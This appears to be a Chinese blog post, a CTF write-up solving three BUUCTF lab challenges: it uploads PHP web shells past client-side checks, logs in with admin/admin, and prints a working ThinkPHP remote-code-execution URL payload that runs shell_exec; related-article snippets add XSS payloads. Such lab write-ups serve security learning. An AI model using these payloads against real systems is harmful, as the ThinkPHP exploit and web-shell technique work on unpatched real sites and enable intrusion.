BUUCTF basic PikaChu & AWD-Test1 & Webug 4.0

已于 2023-05-30 11:22:35 修改
阅读量1.8k 收藏 3
点赞数
分类专栏: BUUCTF basic 文章标签: 安全
于 2022-09-03 19:38:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64558270/article/details/126679814
版权

目录

 

PikaChu

AWD-Test1

Webug 4.0

 

PikaChu

启动靶机,发现是pikachu的靶场,找到文件上传页面

11c46aa666404341bb8e32185588433c.bmp

禁用js (新建页面,输入about:config,搜索javascript.enabled,把true改成false),上传shell

4a6feca4e02544c88d400b3d7068e480.bmp

访问一下这个路径

901296e028814fd991abf27e9cadd7ee.bmp

发现是个空白页,感觉有戏,蚁剑连接

fda40218fe344e1387faadca059a62d7.bmp

 拿到flag               flag{8b7d1c41-0f09-4cf4-8012-77d993f4267e}

AWD-Test1

启动靶机,访问index.php

构造payload

index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cat%20/flag

87c286119c4f4a21ac217b1fdccbfe62.png

拿到flag           flag{e3995ad6-feb7-45ca-9a87-063592c34a18}

Webug 4.0

启动靶机,发现登录框,尝试弱口令,发现admin/admin,可以登录

7226b969e03e4888b1b153cf943f8c61.bmp

找一个简单的文件上传环境(第一个前端绕过的环境)

a7d71147ec5b40969e3a301de58e4a02.bmp

、 禁用js,上传shell

07ba8a599f0a4c6cbbea6045a2925ab8.bmp

通过shell传参获取phpinfo信息

/template/upload/shell.php?1=phpinfo();

e22df0a5ab23420dad47b63812d93f27.bmp

拿到flag                   flag{272d65d7-dee3-406f-be4f-44fe93974806}  

 

WmVicmE=
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF初学解题记录——Basic
u010152530的博客
05-04 5821
目录Linux LabBUU LFI COURSE 1Upload-Labs-LinuxBUU CODE REVIEW 1BUU BRUTE 1未完待续。。。 Linux Lab # 地址和端口为示例,需要更改为动态分配后的地址和端口 ssh root@node233.buuoj.cn -p 233 # 输入默认密码123456 cat /flag.txt # 输出flag: # flag{ef2a6029-xxxx-xxxx-xxxx-86fb808b12f2} # 一开始以为只要大括号的内容就行了。。。
EM&GMM;&k-means
03-17
关于EM、GMM和k-means之间的联系,是笔者曾经的一个分享
buuctf-AWD-测试1
m0_62008601的博客
08-03 2247
thinkphp漏洞复现/ssh远程登录
BUUCTF AWD-Test1
最新发布
qq_60905276的博客
02-29 615
在ThinkPHP框架中,这会被解释为对视图进行显示的操作。content是包含php代码的字符串,其中是执行的恶意代码。看到ThinkPHP,思路瞬间清晰,老熟人了。这个就是ThinkPHP漏洞。根据版本我们去找一下poc。防止有些新朋友不明白POC怎么来的,简短介绍一下。这poc的意思是在URL中发送了一个参数。打开靶场是这个有些简陋的界面。成功打开phpinfo界面。随便点点,找到这个东西。找到flag了,抓取。
BUUCTF-Basic
5L2g556F5ZWl77yf
11-08 2784
文章目录BasicLinux LabsBUU LFI COURSE 1Upload-Labs-LinuxBUU CODE REVIEW 1BUU BRUTE 1BUU SQL COURSE 1sqli-labsBUU UPLOAD COURSE 1BUU BURP COURSE 1BUU XSS COURSE 1 Basic Linux Labs ssh连接/目录下 BUU LFI COURSE 1 <?php /** * Created by PhpStorm. * User: jinzhao
pikachu靶场学习1
weixin_62870602的博客
03-06 5579
pikachu靶场通关 部分 前提:靶场环境部署完成(github上下载源码,进入inc文件夹找到config.inc.php文件修改相关数据即可,若mysql端口冲突最好不要修改其默认的3306端口,将冲突端口关闭即可)。
webug4.0——注入篇
A_dmin的博客
09-09 2624
webug4.0——注入篇 今天接触到一个好玩的靶场环境~~ webug 就去下载安装玩了一下,网盘速度是真的慢,下载下一个下午!!! 附上下载链接:(内附安装教程) 链接: https://pan.baidu.com/s/1WlKzFXsNkfkzzCUR_PYtfA 提取码: jcaa 装好环境,在本地打开,界面还是不错的~ 直接开耍!!! 第一关看题目意思就知道是注入,还是报错注...
draw-pikachu-on-the-web
03-20
在“draw-pikachu-on-the-web”项目中,我们主要关注的是如何利用JavaScript技术在Web浏览器上绘制宝可梦皮卡丘。JavaScript是一种广泛用于网页交互的编程语言,它允许开发者实现动态效果、用户交互以及复杂的图形...
pikachu-master.zip
06-25
Pikachu靶场:全面理解与提升网络安全技能》 "Pikachu-master.zip"这个压缩包文件,无疑为我们提供了一个宝贵的网络安全学习资源——Pikachu靶场。靶场,是网络安全领域中的一个重要概念,它模拟真实网络环境,让...
pikachu-volleyball-p2p-online:通过WebRTC数据通道在线进行Pikachu排球对等
02-04
皮卡丘排球P2P在线✓英语| 皮卡丘排球(対戦ぴかちゅ〜ビ ー チ バ レ ー编)是由“(C)SACHI SOFT / SAWAYAKAN Programmers”和“(C)Satoshi Takenouchi”在1997年开发的一种旧版Windows游戏。...
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
CTF-AWD-WEB AWD 模式下的WEB试题仓库 上传一些参加过的CTF线下赛AWD模式的WEB试题等
AWD_CTF_Platform:一个简单的AWD训练平台
05-13
CTF-AWD 训练平台 [TOC] 项目简介 一个简单的CTF-AWD平台,用于内部小型CTF对抗训练以及培训使用。 特点 docker化,简易部署 可部署在公网上,远程AWD攻防 训练环境可自定义扩展 基本使用方式 pre.py python pre.py web_chinaz 10 web_chinaz 为应用文件名称,10表示要生成的队伍数量 start.py python start.py 10 启动10个实例,以及check和flag服务。 stop_clean.py python stop_clean.py 暂停所有服务,并删除临时文件 注意,这里会删除所有现运行的容器,请谨慎使用。 pass.txt 存储队伍用户名密码,以及ssh、web端口 team01 ctf:308d66 ssh:2201 port:8801 team02 ctf:024b1d ssh:2202 po
PIKACHU-OP-OP:\(ϋ)♩
05-20
Julia-电报机器人项目 :star: 感谢所有为该项目加注星标的人,这意义非凡!这是对使用此免费软件并维护该存储库中自己的fork / imports的每个人的要求,以严格遵守与此存储库关联的LICENSE! 如果您正在使用导入,则...
BUUCTFbasic做题记录(1)
qq_51558360的博客
03-13 2522
Linux Labs 使用ssh连接,用户是 root,密码:123456, -p指定端口,端口是随机的 然后输入yes,后输入密码即可连接上了 ssh -p 25527 root@node3.buuoj.cn BUU LFI COURSE 1 ?file=/var/log/nginx/access.log :包含ngnix的日志记录 BUU CODE REVIEW 1 代码审计: 第一层 get post ?pleaseget=1 pleasepost=2 第二层 md5漏洞 传递md51和
ctf笔记(pikachu) 19.8.27-19.9.14
dingpang8200的博客
09-04 798
本期笔记以pikachu漏洞平台为主 XSS过htmlspecialchars' oninput=alert`1` //' oninput=alert`1` '' onchange=alert`1` //' onchange=alert`1` ' DOM型XSS闭合掉语句,然后构造攻击语句例:'><img src="1" onerror="alert('xss')"&gt...
BUUCTF Basic 解题记录--BUU BURP COURSE 1
weixin_43171033的博客
10-08 1025
6、点击登录,在proxy截获的头信息中添加上本地登录的信息 X-Real-IP:127.0.0.1,再转发即可得到flag,成功。3、将proxy的信息转到repeater区域,尝试看看有什么结果,发现有一个默认用户名和密码的登录界面。2、应该使用X-Real-IP,将这里的IP设置成127.0.0.1不就是本地访问了吗,哈哈哈。4、将标红的一段 X-Real-IP:127.0.0.1 加到proxy中,再转发。看题目就能想到肯定跟burpsuite工具相关,直接打开准备分析数据。
webug4.0——逻辑漏洞篇
A_dmin的博客
09-11 1078
webug4.0——逻辑漏洞篇第二十二关 越权修改密码第二十三关 支付漏洞第二十四关 邮箱轰炸第二十五关 越权查看admin 第二十二关 越权修改密码 进入发现只有两个页面,,, 一个登陆页面,一个修改密码的页面 修改密码的页面是能够成功修改密码的 看情况应该是有两个账号的,我们去查看一下数据库: 果然是有两个账号的,直接拿aaaaa账号来进行越权修改admin的密码 先登录aaaaa进行...
sqltest 1 buu
m0_50967960的博客
05-02 660
wireshark查看流量包 最近刚学了wireshark,使用起来才发现学废了???? 可能为bool盲注的数据包 导出http对象 整理得:102 108 97 103 123 52 55 101 100 98 56 51 48 48 101 100 53 102 57 98 50 56 102 99 53 52 98 48 100 48 57 101 99 100 101 102 55 125 substr函数 例如: select substr(‘abcdefg’,3,4) from
BUUCTF刷题十一道(06)
qq_45837896的博客
07-29 1413
BUUCTF刷题十一道
BUUCTF pikachu
09-25
根据提供的引用内容,"BUUCTF pikachu"是一个关于暴力破解漏洞的测试项目。暴力破解是一种攻击手段,用于获取web应用系统的认证信息。通过使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。暴力破解...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WmVicmE=

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值